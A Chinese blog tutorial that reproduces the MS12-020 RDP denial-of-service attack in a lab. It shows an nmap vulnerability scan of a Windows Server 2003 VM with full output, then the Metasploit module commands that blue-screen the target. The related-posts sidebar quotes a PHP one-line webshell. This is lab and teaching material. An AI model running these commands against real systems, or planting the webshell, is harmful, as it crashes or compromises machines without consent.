利用msf进行ms12-020蓝屏攻击

最新推荐文章于 2023-04-11 12:40:32 发布
最新推荐文章于 2023-04-11 12:40:32 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/107318125
版权

攻击机(kali):192.168.132.144
受害机(winserver2003):192.168.132.134




1.在【我的电脑】->右键选中【管理】,找到系统工具下的【本地用户和组】下的【用户】,在空白处右键添加【新用户】

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述


2.返回桌面,右键我的电脑的属性。选择远程
在这里插入图片描述
选择远程用户
在这里插入图片描述添加
在这里插入图片描述输入我们之前添加的用户,确定
在这里插入图片描述在这里插入图片描述





3.回到kali中,查看是否存在此漏洞可以用msf也可以用nmap扫,这里我演示后者。

nmap --script=vuln 192.168.132.134

能扫出不止一个漏洞:

Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-13 15:41 CST
Nmap scan report for 192.168.132.134
Host is up (0.00053s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
7/tcp    open  echo
9/tcp    open  discard
13/tcp   open  daytime
17/tcp   open  qotd
19/tcp   open  chargen
21/tcp   open  ftp
|_sslv2-drown: 
25/tcp   open  smtp
|_sslv2-drown: 
42/tcp   open  nameserver
53/tcp   open  domain
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp  open  pop3
|_sslv2-drown: 
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1028/tcp open  unknown
1031/tcp open  iad2
1039/tcp open  sbl
1040/tcp open  netsaint
1041/tcp open  danf-ak2
1043/tcp open  boinc
1044/tcp open  dcutility
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
8099/tcp open  unknown
MAC Address: 00:0C:29:6C:0A:11 (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 174.52 seconds

这里演示第一个ms12-020,开msf然后搜索关键字,使用第一个
在这里插入图片描述在这里插入图片描述

msf5 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.132.134
rhost => 192.168.132.134
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

然后会发现靶机蓝屏,如果想防止此漏洞则需要下载安装对应的补丁。
在这里插入图片描述

Deeeelete
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Kali Linux学习篇:Metasploit渗透测试框架入门到实战
07-24
1、课程概要     本课程主要分享Kali Linux渗透测试之Metasploit Framework渗透测试框架入门学习到进阶实战全程课!2、课程目标      本课程致力于帮助广大学员掌握Metasploit渗透测试框架入门到进阶技术!
Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020)
浮生若梦的专栏
06-22 1万+
漏洞版本: Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datac
Microsoft Security Bulletin MS12-020 - CriticalVulnerabilities in Remote Desktop Could Allow Remote
weixin_40191861的博客
04-11 223
see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .hotfix, see .
Windows Server 2008 R2 CVE-2012-0002/CVE-2012-0152 漏洞处理
weixin_43360094的博客
08-05 3956
处理windows Server CVE-2012-0002、CVE-2012-0152漏洞
关于Windows Server 服务器 解决主机漏洞初略指南 (CVE-2015-1635 | CVE-2012-0002 | CVE-2012-0152 | CVE-2017-0144) 等
yang5867331123的博客
06-30 5832
????背景: 亚信/绿盟网络安全公司,对我司实际生产环境服务器,进行渗透测试/漏洞扫描 类别 风险名称 CVE 主机漏洞 MS15-034 HTTP.sys 远程代码执行漏洞(远程检查) CVE-2015-1635 主机漏洞 Microsoft远程桌面协议远程执行代码漏洞(2671387) CVE-2012-0002, CVE-2012-0152 主机漏洞 Microsoft Windows SMB服务器多个漏洞 - 远程(4013389) CVE-2017-0143, CVE-2
ms12-020漏洞复现
wkend的博客
03-30 2670
ms12-020漏洞 远程桌面中的漏洞可能允许远程执行代码。 远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 漏洞复现 在msf中查找该漏洞相关模块search ms12-020 查看模块介绍info ...
Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo的博客
03-02 4776
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
Mybatis接口Mapper内的方法为啥不能重载吗?
程序员麦冬的博客(公众号同名)
09-14 262
动态代理的功能:通过拦截器方法回调,对目标target方法进行增强。 言外之意就是为了增强目标target方法。上面这句话没错,但也不要认为它就是真理,殊不知,动态代理还有投鞭断流的霸权,连目标target都不要的科幻模式。 注:本文默认认为,读者对动态代理的原理是理解的,如果不明白target的含义,难以看懂本篇文章,建议先理解动态代理。 1. 自定义JDK动态代理之投鞭断流实现自动映射器Mapper 首先定义一个pojo。 public class User { private Integer id
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
MS12-020CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020CVE-2012-0002) Exploit 3389远程溢出漏洞代码
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
msf攻击Mysql服务.docx
04-26
本文详细介绍了通过msf对MySQL服务器进行攻击的过程,文中列出了每一个步骤,并详细列出了使用的命令。
LOIC网站压力测试工具
热门推荐
Deeeelete的博客
02-02 2万+
官网下载:https://sourceforge.net/projects/loic/ 百度云:https://pan.baidu.com/s/1VVUjLqtq1mMAD-TJIAnhnQ 1.软件解压后运行,界面如图 2.然后可以在url处输入想要测试的网站网址,也可以输入ip地址,输入完之后要点击右侧的lock on,输入的网站地址会自动填充到selected target中。 3.下...
DirBuster使用教程
Deeeelete的博客
01-28 1万+
工具是kali自带,多用于网站的后台扫描 工具路径:/usr/share/dirbuster cd /usr/share/dirbuster进入路径后ls查看,会看到目录下的jar文件: 2. java -jar DirBuster-1.0-RC1.jar 打开jar文件 3. 出现可视化窗口,配置很多,现在我们先填写空白的输入框部分,这里我们在第一个输入框填写扫描网站的url地址 4....
简单图片木马的生成与利用
Deeeelete的博客
02-08 8602
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
利用burpsuite做简易的文件上传实验,内含软件、插件安装教程
Deeeelete的博客
11-27 4734
软件运行需要提供java环境,没有的话可以自己搜索jdk安装 整体流程: 1:burpsuite软件安装 2:FoxyProxy Standard插件安装 3:phpstudy集成环境安装 4:练习 总结:安装半小时,做题两分钟 1:burpsuite安装 这里使用upload_labs环境进行演示,该环境用于文件上传漏洞的练习,百度云提取码:1etp ,大小为650k burpsuite可以...
wireshark抓取telnet密码
Deeeelete的博客
07-07 2855
受害机:192.168.132.128(win7) 抓取Telnet密码 win7环境 首先确定自己是否有隶属于管理员组的用户 如果没有对应用户,可以去开始 => 控制面板 => 添加和删除用户下添加 然后可以先在本地测试,打开cmd输入telnet localhost 在y过后如果提示失去连接,则说明用户没有被添加到telnet的用户组 进一步操作,去开始菜单=>运行中输入lusrmgr.msc:点击组找到Telnet相关双击打开 然后配置xshell连接 连接成功会显示直接进入c盘
msfms12-020的复现
最新发布
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值